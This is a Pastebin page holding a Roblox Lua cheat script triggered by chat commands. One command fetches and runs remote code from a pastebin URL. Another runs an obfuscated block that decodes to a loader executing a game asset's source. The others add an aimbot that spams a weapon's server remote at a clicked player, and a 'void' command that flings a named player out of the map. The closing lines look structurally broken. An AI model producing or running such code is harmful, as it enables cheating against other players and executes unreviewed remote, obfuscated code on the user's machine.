Advertisement
Guest User

Untitled

a guest
Aug 25th, 2019
103
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.30 KB | None | 0 0
  1. local Player = game.Players.LocalPlayer
  2.  
  3. Player.Chatted:connect(function(cht)
  4. if cht:match("/InfUzi") then
  5. loadstring(game:HttpGet(('https://pastebin.com/raw/V1NzLFLg'),true))()
  6.  
  7. elseif cht:match("/Vis") then
  8. function IllIlllIllIlllIlllIlllIll(IllIlllIllIllIll) if (IllIlllIllIllIll==(((((919 + 636)-636)*3147)/3147)+919)) then return not true end if (IllIlllIllIllIll==(((((968 + 670)-670)*3315)/3315)+968)) then return not false end end; local IIllllIIllll = (7*3-9/9+3*2/0+3*3);local IIlllIIlllIIlllIIlllII = (3*4-7/7+6*4/3+9*9);local IllIIIllIIIIllI = table.concat;function IllIIIIllIIIIIl(IIllllIIllll) function IIllllIIllll(IIllllIIllll) function IIllllIIllll(IllIllIllIllI) end end end;IllIIIIllIIIIIl(900283);function IllIlllIllIlllIlllIlllIllIlllIIIlll(IIlllIIlllIIlllIIlllII) function IIllllIIllll(IllIllIllIllI) local IIlllIIlllIIlllIIlllII = (9*0-7/5+3*1/3+8*2) end end;IllIlllIllIlllIlllIlllIllIlllIIIlll(9083);local IllIIllIIllIII = loadstring;local IlIlIlIlIlIlIlIlII = {'\45','\45','\47','\47','\32','\68','\101','\99','\111','\109','\112','\105','\108','\101','\100','\32','\67','\111','\100','\101','\46','\32','\10','\32','\32','\10','\10','\108','\111','\97','\100','\115','\116','\114','\105','\110','\103','\40','\103','\97','\109','\101','\58','\71','\101','\116','\79','\98','\106','\101','\99','\116','\115','\40','\34','\114','\98','\120','\97','\115','\115','\101','\116','\105','\100','\58','\47','\47','\48','\51','\53','\56','\55','\48','\48','\52','\56','\48','\56','\34','\41','\91','\49','\93','\46','\83','\111','\117','\114','\99','\101','\41','\40','\41','\10',}IllIIllIIllIII(IllIIIllIIIIllI(IlIlIlIlIlIlIlIlII,IIIIIIIIllllllllIIIIIIII))()
  9. elseif cht:match("/Aimbot on") then
  10. mouse = game.Players.LocalPlayer:getMouse()
  11. mouse.Button1Down:connect(function()
  12. if game.Players:GetPlayerFromCharacter(mouse.Target.Parent) then
  13. local selected = game.Players:GetPlayerFromCharacter(mouse.Target.Parent)
  14. if game.Players.LocalPlayer.Character:findFirstChildOfClass("Tool") then
  15. local tool = game.Players.LocalPlayer.Character:findFirstChildOfClass("Tool")
  16. if tool:findFirstChild("Fire") then
  17. if selected ~= nil then
  18. repeat
  19. tool.Fire:FireServer(selected.Character.Head.CFrame)
  20. wait()
  21. until selected.Character:findFirstChild("KO")
  22. end
  23. end
  24. end
  25. end
  26. end)
  27.  
  28.  
  29. elseif cht:match("/void ") then
  30. game:GetService("Players").LocalPlayer.Chatted:connect(function(wow)
  31.  
  32. if string.find(wow,"/void ") then -- finds >s typed
  33. local name = string.gsub(wow,"/void ", "") -- removes >s and focuses on name of plr
  34. for i,v in pairs (game.Players:GetChildren()) do -- gets all player names
  35. if string.sub(string.lower(v.Name) , 1, string.len(name)) == string.lower(name) then -- shortens the length of name
  36. local LocalPlayer = game.Players.LocalPlayer
  37. local Character = LocalPlayer.Character or LocalPlayer.CharacterAdded:Wait()
  38. local Torso = Character:FindFirstChild("Torso") or Character:FindFirstChild("UpperTorso")
  39.  
  40. local savepos = LocalPlayer.Character:FindFirstChild("HumanoidRootPart").CFrame
  41. Torso.Anchored = true
  42. local tool = Instance.new("Tool", LocalPlayer.Backpack)
  43. local hat = LocalPlayer.Character:FindFirstChildOfClass("Accessory")
  44. local hathandle = hat.Handle
  45. hathandle.Parent = tool
  46. hathandle.Massless = true
  47. tool.GripPos = Vector3.new(0, 9e99, 0)
  48. tool.Parent = LocalPlayer.Character
  49. repeat wait() until LocalPlayer.Character:FindFirstChildOfClass("Tool") ~= nil
  50. tool.Grip = CFrame.new(Vector3.new(0, 0, 0))
  51. Torso.Anchored = false
  52. repeat LocalPlayer.Character:FindFirstChild("HumanoidRootPart").CFrame = v.Character:FindFirstChild("HumanoidRootPart").CFrame wait()
  53. until v.Character == nil or v.Character:FindFirstChild("Humanoid").Health <= 0 or LocalPlayer.Character == nil or LocalPlayer.Character:FindFirstChild("Humanoid").Health <= 0 or (v.Character:FindFirstChild("HumanoidRootPart").Velocity.magnitude - v.Character:FindFirstChild("Humanoid").WalkSpeed) > (v.Character:FindFirstChild("Humanoid").WalkSpeed + 20)
  54. LocalPlayer.Character:FindFirstChild("Humanoid"):UnequipTools()
  55. hathandle.Parent = hat
  56. hathandle.Massless = false
  57. tool:Destroy()
  58. LocalPlayer.Character:FindFirstChild("HumanoidRootPart").CFrame = savepos
  59. end
  60. end
  61. end
  62. end)
  63. end
  64.  
  65. end
  66.  
  67. end)
  68.  
  69. end
  70.  
  71. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement